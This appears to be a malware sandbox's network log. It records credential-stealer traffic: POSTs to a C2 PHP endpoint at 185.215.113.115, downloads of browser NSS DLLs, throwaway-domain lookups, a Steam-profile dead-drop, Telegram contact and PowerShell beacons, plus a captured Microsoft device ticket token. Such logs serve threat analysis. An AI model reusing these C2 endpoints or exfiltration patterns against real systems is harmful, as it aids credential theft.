                                                                                              POST
                                                                                              https://nw-umwatson.events.data.microsoft.com/Telemetry.Request
                                                                                              msedge.exe
                                                                                              Remote address:
                                                                                              20.42.73.29:443
                                                                                              Request
                                                                                              POST /Telemetry.Request HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/xml
                                                                                              User-Agent: Crashpad/0.8.0 WinHTTP/10.0.19041.1151 Windows_NT/10.0.19041.1202 (x64)
                                                                                              MSA_DeviceTicket: t=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&p=
                                                                                              Content-Length: 3400
                                                                                              Host: nw-umwatson.events.data.microsoft.com
                                                                                              Response
                                                                                              HTTP/1.1 200 200 OK
                                                                                              Content-Length: 638
                                                                                              Content-Type: text/xml
                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Access-Control-Allow-Methods: POST
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Date: Thu, 20 Feb 2025 00:34:21 GMT
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://nw-umwatson.events.data.microsoft.com/Telemetry.Request
                                                                                              msedge.exe
                                                                                              Remote address:
                                                                                              20.42.73.29:443
                                                                                              Request
                                                                                              POST /Telemetry.Request HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/xml
                                                                                              User-Agent: Crashpad/0.8.0 WinHTTP/10.0.19041.1151 Windows_NT/10.0.19041.1202 (x64)
                                                                                              MSA_DeviceTicket: t=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&p=
                                                                                              Content-Length: 3400
                                                                                              Host: nw-umwatson.events.data.microsoft.com
                                                                                              Response
                                                                                              HTTP/1.1 200 200 OK
                                                                                              Content-Length: 638
                                                                                              Content-Type: text/xml
                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Access-Control-Allow-Methods: POST
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Date: Thu, 20 Feb 2025 00:34:21 GMT
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://nw-umwatson.events.data.microsoft.com/Telemetry.Request
                                                                                              msedge.exe
                                                                                              Remote address:
                                                                                              20.42.73.29:443
                                                                                              Request
                                                                                              POST /Telemetry.Request HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/xml
                                                                                              User-Agent: Crashpad/0.8.0 WinHTTP/10.0.19041.1151 Windows_NT/10.0.19041.1202 (x64)
                                                                                              MSA_DeviceTicket: t=EwCYA1N5BAAURwgwBpuLliVWV80BZoa1ueVtl08AAbayyqCpHWDuAzsBwW2NcIuAlrQAKTC/jcAZ3KuOlTOvEFYNc1M7RvDrnG3QeMoe1M2JJKc4cLpzHaBKP4qF+f7Ll6a0rsFc7fbZ+7wFcH9JFFfK+wui0u2ozfDyMzY5YNgIcIWeBmEH6qTPF3qG+mpv4nl/QixuvZSz8Et0Yjosnbrw4SAKieZy8fEjyzVX1Yh1rIq5lSuoP8lbzElKcJb5Jm47JWHMHyZamKt7YqTfTU5lz4m/2NnD4wIxeA9sYReJciiMiFOcGQORIs08xKtusPy81IEttxMZxZPKW+B9kFCtmjs3mQVu6x2sDtXEMN0ITiCiWCYplHKcQMSBkEQQZgAAEDBY2+941QjvDl7cW56W9Z5gAoNphIvc0X16whul1AAtA0CUCD53y7AMnYHbD1hiHak2ib5JYnltgQVZ5DHDREVXveU/AnaXJNd4AzqmBo2JcT++qMhrPF+XsWlYKQNAbeaCnZr4EEyhaO7kaSsFyXbo+4CcrW3/IXwLDVJ0y8RoC4l2wSV+OjW6tNfZzYDyKOsrPjwnJSouAvZWTAwFb3xHzRKnfcMaL2jU2Z5xg4RZizl1oB93/xxe4iTpbdDRt9/7ZK1OQNGekggm97X1O0+haPnjhylOKsy92g1JjWGzBFH8vNuQIaaJ4bBfZ+TVxMXtfYnj2ZN3deyq+WN40Q7nUFEChCjH+25uV0dc8lBXEpmKhvxCaJftKNzFPmv5NwNjaLp3hTou6LH3xVjMn8dKPDVa5zYjNdb5/w0J2VxgTROSDEnYtWZIBE6lsQDTWbiG7WFeeobqPFnk4hJVd9URFu7LyOSFQG54/RV68XXh5yPgcII3ewQ1WbnQHfaNgw0Hputwp9ygknan3TeyiDWmMVyBNU25WzU8+FgOmRGFhg2JOCtaXQBzn62QM7pqPgbPu0D8337I70OdI1rFyc4X1u1QSUOmntIaP0hBLLQqnkwW7DGuMmJYEkAEcnabhe6M9aXbzmD3hFxm6aEU0YmWsqcmJPnx8ArT6ArsANiKiHfrnKk+LLMxJdFSmAbkMT3Na9+yH18CnTJ770DG0km1clqmllU6n2aLjlYm86jW4S3hRrHBAqnWaJHR1WBUsKaHAsQ/0Cl4YKanTp/Qf9+Bc1sVVQE87c3rpQfEVoIQrt8dJ+X6snwyxQP3V3rXybcZkgI=&p=
                                                                                              Content-Length: 3400
                                                                                              Host: nw-umwatson.events.data.microsoft.com
                                                                                              Response
                                                                                              HTTP/1.1 200 200 OK
                                                                                              Content-Length: 638
                                                                                              Content-Type: text/xml
                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Access-Control-Allow-Methods: POST
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Date: Thu, 20 Feb 2025 00:34:21 GMT
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://nw-umwatson.events.data.microsoft.com/Telemetry.Request
                                                                                              msedge.exe
                                                                                              Remote address:
                                                                                              20.42.73.29:443
                                                                                              Request
                                                                                              POST /Telemetry.Request HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/xml
                                                                                              User-Agent: Crashpad/0.8.0 WinHTTP/10.0.19041.1151 Windows_NT/10.0.19041.1202 (x64)
                                                                                              MSA_DeviceTicket: t=EwCYA1N5BAAURwgwBpuLliVWV80BZoa1ueVtl08AAbayyqCpHWDuAzsBwW2NcIuAlrQAKTC/jcAZ3KuOlTOvEFYNc1M7RvDrnG3QeMoe1M2JJKc4cLpzHaBKP4qF+f7Ll6a0rsFc7fbZ+7wFcH9JFFfK+wui0u2ozfDyMzY5YNgIcIWeBmEH6qTPF3qG+mpv4nl/QixuvZSz8Et0Yjosnbrw4SAKieZy8fEjyzVX1Yh1rIq5lSuoP8lbzElKcJb5Jm47JWHMHyZamKt7YqTfTU5lz4m/2NnD4wIxeA9sYReJciiMiFOcGQORIs08xKtusPy81IEttxMZxZPKW+B9kFCtmjs3mQVu6x2sDtXEMN0ITiCiWCYplHKcQMSBkEQQZgAAEDBY2+941QjvDl7cW56W9Z5gAoNphIvc0X16whul1AAtA0CUCD53y7AMnYHbD1hiHak2ib5JYnltgQVZ5DHDREVXveU/AnaXJNd4AzqmBo2JcT++qMhrPF+XsWlYKQNAbeaCnZr4EEyhaO7kaSsFyXbo+4CcrW3/IXwLDVJ0y8RoC4l2wSV+OjW6tNfZzYDyKOsrPjwnJSouAvZWTAwFb3xHzRKnfcMaL2jU2Z5xg4RZizl1oB93/xxe4iTpbdDRt9/7ZK1OQNGekggm97X1O0+haPnjhylOKsy92g1JjWGzBFH8vNuQIaaJ4bBfZ+TVxMXtfYnj2ZN3deyq+WN40Q7nUFEChCjH+25uV0dc8lBXEpmKhvxCaJftKNzFPmv5NwNjaLp3hTou6LH3xVjMn8dKPDVa5zYjNdb5/w0J2VxgTROSDEnYtWZIBE6lsQDTWbiG7WFeeobqPFnk4hJVd9URFu7LyOSFQG54/RV68XXh5yPgcII3ewQ1WbnQHfaNgw0Hputwp9ygknan3TeyiDWmMVyBNU25WzU8+FgOmRGFhg2JOCtaXQBzn62QM7pqPgbPu0D8337I70OdI1rFyc4X1u1QSUOmntIaP0hBLLQqnkwW7DGuMmJYEkAEcnabhe6M9aXbzmD3hFxm6aEU0YmWsqcmJPnx8ArT6ArsANiKiHfrnKk+LLMxJdFSmAbkMT3Na9+yH18CnTJ770DG0km1clqmllU6n2aLjlYm86jW4S3hRrHBAqnWaJHR1WBUsKaHAsQ/0Cl4YKanTp/Qf9+Bc1sVVQE87c3rpQfEVoIQrt8dJ+X6snwyxQP3V3rXybcZkgI=&p=
                                                                                              Content-Length: 3400
                                                                                              Host: nw-umwatson.events.data.microsoft.com
                                                                                              Response
                                                                                              HTTP/1.1 200 200 OK
                                                                                              Content-Length: 638
                                                                                              Content-Type: text/xml
                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Access-Control-Allow-Methods: POST
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Date: Thu, 20 Feb 2025 00:34:21 GMT
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDB
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 431
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:21 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----AKEGIIJDGHCAKFHJEHCF
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 363
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:22 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=99
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.115/68b591d6548ec281/freebl3.dll
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              GET /68b591d6548ec281/freebl3.dll HTTP/1.1
                                                                                              Host: 185.215.113.115
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:22 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                              ETag: "a7550-5e7e950876500"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 685392
                                                                                              Content-Type: application/x-msdos-program
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.115/68b591d6548ec281/mozglue.dll
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              GET /68b591d6548ec281/mozglue.dll HTTP/1.1
                                                                                              Host: 185.215.113.115
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:23 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                              ETag: "94750-5e7e950876500"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 608080
                                                                                              Content-Type: application/x-msdos-program
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.115/68b591d6548ec281/msvcp140.dll
  Process: ee1401f004.exe    Remote address: 185.215.113.115:80
  Request:
    GET /68b591d6548ec281/msvcp140.dll HTTP/1.1
    Host: 185.215.113.115
    Cache-Control: no-cache
  Response:
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:24 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
    ETag: "6dde8-5e7e950876500"
    Accept-Ranges: bytes
    Content-Length: 450024
    Content-Type: application/x-msdos-program

• [RU] GET http://185.215.113.115/68b591d6548ec281/nss3.dll
  Process: ee1401f004.exe    Remote address: 185.215.113.115:80
  Request:
    GET /68b591d6548ec281/nss3.dll HTTP/1.1
    Host: 185.215.113.115
    Cache-Control: no-cache
  Response:
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:24 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
    ETag: "1f3950-5e7e950876500"
    Accept-Ranges: bytes
    Content-Length: 2046288
    Content-Type: application/x-msdos-program

• [RU] GET http://185.215.113.115/68b591d6548ec281/softokn3.dll
  Process: ee1401f004.exe    Remote address: 185.215.113.115:80
  Request:
    GET /68b591d6548ec281/softokn3.dll HTTP/1.1
    Host: 185.215.113.115
    Cache-Control: no-cache
  Response:
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:29 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
    ETag: "3ef50-5e7e950876500"
    Accept-Ranges: bytes
    Content-Length: 257872
    Content-Type: application/x-msdos-program

• [RU] GET http://185.215.113.115/68b591d6548ec281/vcruntime140.dll
  Process: ee1401f004.exe    Remote address: 185.215.113.115:80
  Request:
    GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1
    Host: 185.215.113.115
    Cache-Control: no-cache
  Response:
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:29 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
    ETag: "13bf0-5e7e950876500"
    Accept-Ranges: bytes
    Content-Length: 80880
    Content-Type: application/x-msdos-program

• [RU] POST http://185.215.113.115/c4becf79229cb002.php
  Process: ee1401f004.exe    Remote address: 185.215.113.115:80
  Request:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GCFHDAKECFIDGDGDBKJD
    Host: 185.215.113.115
    Content-Length: 823
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response:
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:29 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=92
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

• [RU] POST http://185.215.113.115/c4becf79229cb002.php
  Process: ee1401f004.exe    Remote address: 185.215.113.115:80
  Request:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----EGIDAFBAEBKKEBFIJEBK
    Host: 185.215.113.115
    Content-Length: 1467
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response:
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:30 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=91
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

• [RU] POST http://185.215.113.115/c4becf79229cb002.php
  Process: ee1401f004.exe    Remote address: 185.215.113.115:80
  Request:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDH
    Host: 185.215.113.115
    Content-Length: 267
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response:
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:31 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 2408
    Keep-Alive: timeout=5, max=90
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

• [RU] POST http://185.215.113.115/c4becf79229cb002.php
  Process: ee1401f004.exe    Remote address: 185.215.113.115:80
  Request:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HJEBGHIEBFIJKECBKFHD
    Host: 185.215.113.115
    Content-Length: 265
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response:
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:31 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=89
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

• [RU] POST http://185.215.113.115/c4becf79229cb002.php
  Process: ee1401f004.exe    Remote address: 185.215.113.115:80
  Request:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----FIDAFIEBFCBKFHIDHIJE
    Host: 185.215.113.115
    Content-Length: 363
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response:
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:31 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=88
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

• [RU] POST http://185.215.113.115/c4becf79229cb002.php
  Process: ee1401f004.exe    Remote address: 185.215.113.115:80
  Request:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHI
    Host: 185.215.113.115
    Content-Length: 272
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response:
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:31 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=87
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

• [RU] POST http://185.215.113.115/c4becf79229cb002.php
  Process: ee1401f004.exe    Remote address: 185.215.113.115:80
  Request:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDH
    Host: 185.215.113.115
    Content-Length: 272
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response:
    HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 00:34:31 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=86
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

• [US] DNS api.telegram.org
  Process: trano1221.exe    Remote address: 8.8.8.8:53
  Request:  api.telegram.org IN A
  Response: api.telegram.org IN A 149.154.167.220

• [US] DNS elviscomputer.hu
  Process: powershell.exe    Remote address: 8.8.8.8:53
  Request:  elviscomputer.hu IN A
  Response: elviscomputer.hu IN A 195.228.152.90

• [HU] POST http://elviscomputer.hu/wp-content/uploads/2021/01/engine.php
  Process: powershell.exe    Remote address: 195.228.152.90:80
  Request:
    POST /wp-content/uploads/2021/01/engine.php HTTP/1.1
    Host: elviscomputer.hu
    Connection: close
    Accept-Encoding: gzip,deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 67
    Accept: */*
    Accept-Language: *
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3099.28 Safari/537.36
    Referer: http://elviscomputer.hu
  Response:
    HTTP/1.1 403 Forbidden
    Server: nginx
    Date: Thu, 20 Feb 2025 00:34:26 GMT
    Content-Type: text/html
    Content-Length: 8341
    Connection: close
    ETag: "63912a21-2095"

• [US] DNS i.instagram.com
  Process: powershell.exe    Remote address: 8.8.8.8:53
  Request:  i.instagram.com IN A
  Response: i.instagram.com IN CNAME instagram.c10r.instagram.com
            instagram.c10r.instagram.com IN A 163.70.151.63

• [US] DNS breakfasutwy.cyou
  Process: c6a31d1295.exe    Remote address: 8.8.8.8:53
  Request:  breakfasutwy.cyou IN A
  Response: (empty)

• [US] DNS importenptoc.com
  Process: c6a31d1295.exe    Remote address: 8.8.8.8:53
  Request:  importenptoc.com IN A
  Response: (empty)
                                                                                            • flag-us
                                                                                              DNS
                                                                                              voicesharped.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              voicesharped.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              inputrreparnt.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              inputrreparnt.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              torpdidebar.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              torpdidebar.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              rebeldettern.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              rebeldettern.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              actiothreaz.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              actiothreaz.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              garulouscuto.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              garulouscuto.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              breedertremnd.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              breedertremnd.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              steamcommunity.com
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              steamcommunity.com
                                                                                              IN A
                                                                                              Response
                                                                                              steamcommunity.com
                                                                                              IN A
                                                                                              104.82.234.109
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://steamcommunity.com/profiles/76561199822375128
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              104.82.234.109:443
                                                                                              Request
                                                                                              GET /profiles/76561199822375128 HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Host: steamcommunity.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;
                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                              Cache-Control: no-cache
                                                                                              Date: Thu, 20 Feb 2025 00:34:28 GMT
                                                                                              Content-Length: 35769
                                                                                              Connection: keep-alive
                                                                                              Set-Cookie: sessionid=ed58617d279cbd03ef5c6ad9; Path=/; Secure; SameSite=None
                                                                                              Set-Cookie: steamCountry=GB%7Cdcacbc5cf7f4b2dc1ed43dd213cf0dc5; path=/; secure; HttpOnly; SameSite=None
                                                                                            • flag-us
                                                                                              DNS
                                                                                              nestlecompany.pro
                                                                                              con12312211221.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              nestlecompany.pro
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              shiningrstars.help
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              shiningrstars.help
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              mercharena.biz
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              mercharena.biz
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              t.me
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              t.me
                                                                                              IN A
                                                                                              Response
                                                                                              t.me
                                                                                              IN A
                                                                                              149.154.167.99
                                                                                            • flag-us
                                                                                              DNS
                                                                                              generalmills.pro
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              generalmills.pro
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              con12312211221.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:34:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jQLa9yMibAAyZxYDBA0mLqInaIrlvO%2BGaZ8hT5TdABeuOGfldEJXVidQT%2B%2Bcz5NxpHRHrRjGvuDAPW%2Fwx7PlegG5RUfT6Vw7QnVH%2Fu59AhGZKN94aF9wnLJytX7ZW6a01g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a693fa8c67717-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              con12312211221.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=dft4D3C583KGDOmib_4ps1U4I78YMNqbdR5m2Z_DxZQ-1740011668-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 50
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=vborrppbk4cgki3rjfhncj70oj; expires=Fri, 21 Feb 2025 00:34:28 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5QSIyZt8eK5D1tm8ls%2B%2F3nKOEYPVRZtW9oWJ7duJDRAl%2BOdjS2dRdyo9BaSLU3REiPyTofiB0b%2FWwcihxnF2PJZuezGUliJr6wyqvnB7PZSum42wJPQhoAtwkUTxtVIdKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a694009627717-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
